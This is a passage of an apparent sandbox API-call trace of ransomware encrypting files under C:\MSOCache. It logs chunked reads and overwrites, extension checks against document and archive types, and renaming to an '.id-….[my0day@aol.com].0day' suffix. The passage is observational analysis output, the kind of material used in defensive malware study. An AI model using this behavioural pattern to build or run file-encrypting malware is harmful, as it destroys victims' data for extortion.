dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.759] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.759] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.759] ReadFile (in: hFile=0x208, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.763] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.763] ReadFile (in: hFile=0x208, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.819] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.819] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.819] ReadFile (in: hFile=0x208, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.842] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.842] WriteFile (in: hFile=0x208, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0045.857] SetEndOfFile (hFile=0x208) returned 1 [0045.857] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ee2070 [0045.860] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.860] WriteFile (in: hFile=0x208, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.861] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.861] WriteFile (in: hFile=0x208, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.118] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.118] WriteFile (in: hFile=0x208, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.119] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ee2070 | out: hHeap=0x5f0000) returned 1 [0046.122] CloseHandle (hObject=0x208) returned 1 [0046.387] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0046.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.779] lstrlenW (lpString=".doc") returned 4 [0046.779] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.780] lstrlenW (lpString=".docx") returned 5 [0046.780] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0046.780] lstrlenW (lpString=".pdf") returned 4 [0046.781] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.802] lstrlenW (lpString=".xls") returned 4 [0046.802] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.805] lstrlenW (lpString=".xlsx") returned 5 [0046.824] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0046.825] lstrlenW (lpString=".ppt") returned 4 [0046.825] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.826] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.826] lstrlenW (lpString=".zip") returned 4 [0046.826] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.826] lstrlenW (lpString=".rar") returned 4 [0046.826] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.828] lstrlenW (lpString=".bz2") returned 4 [0046.831] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.832] lstrlenW (lpString=".7z") returned 3 [0046.833] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.833] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.834] lstrlenW (lpString=".dbf") returned 4 [0046.834] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.840] lstrlenW (lpString=".1cd") returned 4 [0046.840] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.844] lstrlenW (lpString=".jpg") returned 4 [0046.844] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.903] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0046.903] lstrlenW (lpString=".doc") returned 4 [0046.903] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.940] lstrlenW (lpString=".docx") returned 5 [0046.940] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0046.940] lstrlenW (lpString=".pdf") returned 4 [0046.959] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.959] lstrlenW (lpString=".xls") returned 4 [0046.978] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.978] lstrlenW (lpString=".xlsx") returned 5 [0046.978] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0046.978] lstrlenW (lpString=".ppt") returned 4 [0047.188] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.189] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.191] lstrlenW (lpString=".zip") returned 4 [0047.191] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.191] lstrlenW (lpString=".rar") returned 4 [0047.191] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.191] lstrlenW (lpString=".bz2") returned 4 [0047.192] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.192] lstrlenW (lpString=".7z") returned 3 [0047.192] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.192] lstrlenW (lpString=".dbf") returned 4 [0047.193] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.194] lstrlenW (lpString=".1cd") returned 4 [0047.195] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.198] lstrlenW (lpString=".jpg") returned 4 [0047.198] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.198] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0047.198] lstrlenW (lpString="PrjProrWW.msi") returned 13 [0047.198] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0047.516] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=10798080) returned 1 [0047.516] CloseHandle (hObject=0x174) returned 1 [0047.516] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020 [0047.516] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.516] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0047.517] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0047.517] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0047.517] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.517] ReadFile (in: hFile=0x174, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.521] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.521] ReadFile (in: hFile=0x174, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.527] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.527] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.527] ReadFile (in: hFile=0x174, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.545] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.545] WriteFile (in: hFile=0x174, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0047.769] SetEndOfFile (hFile=0x174) returned 1 [0047.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f52098 [0047.770] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0047.770] WriteFile (in: hFile=0x174, lpBuffer=0x3f52098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f52098*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.770] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0047.770] WriteFile (in: hFile=0x174, lpBuffer=0x3f52098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f52098*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.772] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0047.772] WriteFile (in: hFile=0x174, lpBuffer=0x3f52098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f52098*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.777] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0047.777] CloseHandle (hObject=0x174) returned 1 [0047.777] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0047.777] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.777] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.777] lstrlenW (lpString=".doc") returned 4 [0047.777] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.777] lstrlenW (lpString=".docx") returned 5 [0047.777] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0047.777] lstrlenW (lpString=".pdf") returned 4 [0047.777] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.777] lstrlenW (lpString=".xls") returned 4 [0047.777] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.777] lstrlenW (lpString=".xlsx") returned 5 [0047.777] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0047.777] lstrlenW (lpString=".ppt") returned 4 [0047.778] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.778] lstrlenW (lpString=".zip") returned 4 [0047.778] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.778] lstrlenW (lpString=".rar") returned 4 [0047.778] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.778] lstrlenW (lpString=".bz2") returned 4 [0047.778] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.778] lstrlenW (lpString=".7z") returned 3 [0047.778] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.778] lstrlenW (lpString=".dbf") returned 4 [0047.778] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.778] lstrlenW (lpString=".1cd") returned 4 [0047.778] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.778] lstrlenW (lpString=".jpg") returned 4 [0047.778] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.778] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.778] lstrlenW (lpString=".doc") returned 4 [0047.778] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.778] lstrlenW (lpString=".docx") returned 5 [0047.778] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0047.778] lstrlenW (lpString=".pdf") returned 4 [0047.778] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.778] lstrlenW (lpString=".xls") returned 4 [0047.778] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.778] lstrlenW (lpString=".xlsx") returned 5 [0047.778] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0047.778] lstrlenW (lpString=".ppt") returned 4 [0047.779] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.779] lstrlenW (lpString=".zip") returned 4 [0047.779] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.779] lstrlenW (lpString=".rar") returned 4 [0047.779] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.779] lstrlenW (lpString=".bz2") returned 4 [0047.779] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.779] lstrlenW (lpString=".7z") returned 3 [0047.779] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.779] lstrlenW (lpString=".dbf") returned 4 [0047.779] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.779] lstrlenW (lpString=".1cd") returned 4 [0047.779] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.779] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0047.779] lstrlenW (lpString=".jpg") returned 4 [0047.779] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.779] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0047.779] lstrlenW (lpString="setup.exe") returned 9 [0047.779] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0047.780] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1377656) returned 1 [0047.780] CloseHandle (hObject=0x174) returned 1 [0047.780] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0047.780] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.780] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0047.780] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.780] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.780] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0047.780] GetLastError () returned 0x0 [0047.780] ReadFile (in: hFile=0x174, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.145] WriteFile (in: hFile=0x21c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0048.210] ReadFile (in: hFile=0x174, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x50588, lpOverlapped=0x0) returned 1 [0048.232] WriteFile (in: hFile=0x21c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x50590, lpOverlapped=0x0) returned 1 [0048.241] ReadFile (in: hFile=0x174, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.241] WriteFile (in: hFile=0x21c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.241] SetEndOfFile (hFile=0x21c) returned 1 [0048.241] CloseHandle (hObject=0x21c) returned 1 [0048.241] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.241] SetEndOfFile (hFile=0x174) returned 1 [0048.244] CloseHandle (hObject=0x174) returned 1 [0048.244] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.245] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0048.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.245] lstrlenW (lpString=".doc") returned 4 [0048.245] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.245] lstrlenW (lpString=".docx") returned 5 [0048.245] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0048.245] lstrlenW (lpString=".pdf") returned 4 [0048.245] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.245] lstrlenW (lpString=".xls") returned 4 [0048.245] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.245] lstrlenW (lpString=".xlsx") returned 5 [0048.245] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0048.245] lstrlenW (lpString=".ppt") returned 4 [0048.245] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.245] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.245] lstrlenW (lpString=".zip") returned 4 [0048.245] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.245] lstrlenW (lpString=".rar") returned 4 [0048.245] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.245] lstrlenW (lpString=".bz2") returned 4 [0048.245] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.245] lstrlenW (lpString=".7z") returned 3 [0048.245] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString=".dbf") returned 4 [0048.246] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString=".1cd") returned 4 [0048.246] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString=".jpg") returned 4 [0048.246] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0048.246] lstrlenW (lpString="C:\\MSOCache\\All 